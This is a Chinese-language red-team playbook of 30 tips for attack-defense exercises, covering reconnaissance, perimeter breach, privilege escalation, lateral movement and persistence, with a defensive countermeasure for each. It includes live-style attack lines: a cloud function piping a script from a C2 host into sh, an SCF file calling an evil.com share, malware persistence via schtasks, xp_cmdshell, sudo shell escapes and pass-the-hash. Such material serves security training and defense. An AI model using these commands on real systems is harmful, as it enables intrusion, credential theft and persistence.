实战攻防演练期间,你必备的30条红队打点思路!
从边缘突破到核心渗透的完整攻击链构建,在攻防演练中,红队的首要任务是快速建立有效攻击据点。本文基于项目经验,提炼出30条经过实战验证的打点思路,覆盖信息收集、漏洞利用、权限提升等关键环节,供参考。
一、信息收集阶段
1. 企业数字资产测绘
-
• 手法:
通过企查查获取子公司列表 → 使用Amass进行关联域名发现 → Subfinder爆破三级域名subfinder -d example.com -o subdomains.txt -
• 案例:某电商企业通过子公司域名发现未下线的测试环境(test.retail.example.com) -
• 防御:建立自动化资产盘点系统,每周扫描暴露面
2. GitHub敏感信息狩猎
-
• 实战技巧: # 使用GitHub API搜索API密钥 requests.get("https://api.github.com/search/code?q=org:Company+filename:.env+password") -
• 关键发现:某金融机构泄露阿里云AK/SK导致OSS桶被拖取 -
• 防护:部署GitGuardian等自动扫描工具
3. 历史漏洞关联利用
-
• 操作路径:
CNVD → ExploitDB → 目标企业名称 -
• 典型漏洞:Struts2 S2-045(CVE-2017-5638)在老旧系统未修复 -
• 加固:建立CVE漏洞生命周期管理机制
4. 证书透明度日志监控
-
• 工具:CertSpotter实时监控新签发的域名证书 -
• 战果:通过新证书发现未备案的vpn.newoffice.example.com -
• 防御:订阅CT日志告警
5. 员工信息画像构建
-
• 方法:
社交媒体员工职位分析 + 脉脉部门架构 → 生成社工字典 -
• 字典样例:
{部门缩写}{姓名首字母}{入职年份}@example.com -
• 防护:员工安全意识培训+登录异常检测
二、边界突破技巧
6. 失效资产再利用
-
• 场景:
接管废弃子域名(如停用的xx.example.com)# 验证DNS解析残留 dig CNAME old-app.example.com -
• 案例:某物流公司停用系统未删除云解析记录 -
• 防御:资产下线自动化清理流程
7. OAuth令牌劫持
-
• 漏洞利用:
截获未校验state参数的OAuth回调请求 -
• 工具:修改Burp OAuth插件实现自动化 -
• 防护:强制PKCE校验+state参数绑定会话
8. API未授权访问
-
• 高频漏洞点: GET /api/v1/users?page=1&size=100 # 用户信息泄露 POST /actuator/refresh # Spring Boot配置重载 -
• 防御:网关层强制身份认证
9. 云存储桶接管
-
• 攻击路径: -
1. 扫描 s3.{region}.amazonaws.com -
2. 尝试 aws s3 ls s3://bucket-name --no-sign-request
-
-
• 战果:某视频平台配置桶可匿名写导致首页篡改 -
• 加固:开启存储桶策略校验
10. 邮件服务器渗透
-
• 手法: nmap -p25,465,587 --script smtp-open-relay target.com -
• 利用:通过开放转发发送钓鱼邮件 -
• 防护:禁用SMTP匿名中继
11. VPN漏洞链利用
-
• 经典组合拳:
CVE-2019-11510(Pulse VPN)→ 读取/etc/passwd → 密码破解 -
• 防御:VPN设备纳入高危漏洞快速响应机制
12. WAF绕过实战
-
• SQL注入绕过: /*!50000SELECT*/1,2,3FROM users # MySQL内联注释 -
• 工具:sqlmap tamper脚本定制 -
• 防护:WAF规则深度调优(非默认规则)
13. 0day武器化投放
-
• 操作守则: -
• 仅用于授权目标 -
• 优先选择无文件攻击方式 -
• 使用Cobalt Strike内存加载
-
-
• 防护:EDR+流量沙箱联动分析
三、权限提升路径
14. Windows本地提权
-
• 漏洞利用链: 服务账户 SeImpersonatePrivilege PrintSpoofer.exe SYSTEM权限 -
• 工具:SweetPotato提权套件 -
• 防御:禁用非必要服务权限
15. Linux sudo滥用
-
• 检测命令: sudo -l | grep -E 'nmap|vim|find|python' -
• 经典利用: sudo vim -c ':!/bin/bash' # 通过vim提权 -
• 加固:最小化sudo权限
16. Kerberos委派攻击
-
• 攻击流程: -
1. 使用BloodHound识别约束委派 -
2. 通过s4u2self获取目标服务票据
-
-
• 工具:Rubeus自动化利用 -
• 防护:禁用非必要委派
17. 云角色权限提升
-
• AWS场景: { "Effect":"Allow", "Action":"iam:PassRole", "Resource":"*" // 高风险配置 } -
• 利用:通过PassRole获得管理员权限 -
• 防御:遵循最小权限原则
18. 数据库提权
-
• MSSQL利用: EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'whoami'; -
• 防护:删除危险存储过程
19. 计划任务劫持
-
• Windows检测: Get-ScheduledTask | Where State -eq"Ready" -
• 利用:替换任务执行的脚本文件 -
• 防御:计划任务文件ACL控制
20. DLL劫持路径
-
• 工具:Process Monitor监控加载行为 -
• 防护:启用DLL签名验证
四、横向移动策略(6种隐蔽通道)
21. NTLM中继攻击
-
• 配置要点: [Responder] SMB = Off # 禁用自身SMB服务 HTTP = Off -
• 工具链:Responder + ntlmrelayx.py -
• 防御:启用SMB签名
22. Pass-the-Hash实战
-
• 命令: crackmapexec smb 10.0.0.0/24 -u administrator -H <NTLM_HASH> -
• 防护:限制本地管理员权限
23. 金票据生成
-
• 条件: -
• krbtgt的NTLM Hash -
• 域名SID
-
-
• 工具:mimikatz kerberos::golden -
• 防御:定期重置krbtgt密码
24. WMI无文件渗透
-
• 远程执行: Invoke-WmiMethod-ComputerName DC01 -Class Win32_Process -Name Create -ArgumentList"calc.exe" -
• 检测:Sysmon事件ID 19监控
25. SCF文件劫持
-
• 武器化文件: [Shell] Command=2 IconFile=\\evil.com\share\pentestlab.ico -
• 防护:禁用WebClient服务
26. 打印机漏洞利用
-
• 漏洞:CVE-2021-1675(PrintNightmare) -
• 检测命令: rpcdump.py | grep MS-RPRN -
• 加固:禁用Point and Print
五、权限维持技巧
27. 隐藏计划任务
-
• 创建命令: schtasks /create /tn "UpdateService" /tr "C:\malware.exe" /sc hourly /ru SYSTEM /f -
• 检测:Autoruns分析隐藏任务
28. 影子账户克隆
-
• 步骤: -
1. 激活Administrator账户 -
2. 修改注册表 F值克隆账户
-
-
• 工具:mimikatz ts::sessions -
• 防御:监控SAM数据库变更
29. Office加载项后门
-
• 部署路径:
%AppData%\Microsoft\Word\STARTUP\ -
• 检测:启用宏执行日志审计
30. 云函数持久化
-
• AWS Lambda示例: defhandler(event, context): os.system("curl http://c2_ip/install.sh | sh") -
• 防护:函数代码完整性检查
红队行动备忘录
三条铁律:
-
1. 所有操作必须获得书面授权 -
2. 数据渗出需进行匿名化处理 -
3. 清理所有攻击痕迹(包括内存驻留)
典型失败案例:
某红队因未清除Mimikatz内存dump被蓝队溯源,导致攻击路径完全暴露
攻防本质是成本对抗,红队的价值在于帮助企业以最小代价发现致命弱点。演练结束才是真正安全建设的开始。
文章来源:乌雲安全
如侵权请私聊我们删文
官方
5.57K篇文章
177.67M总阅读量
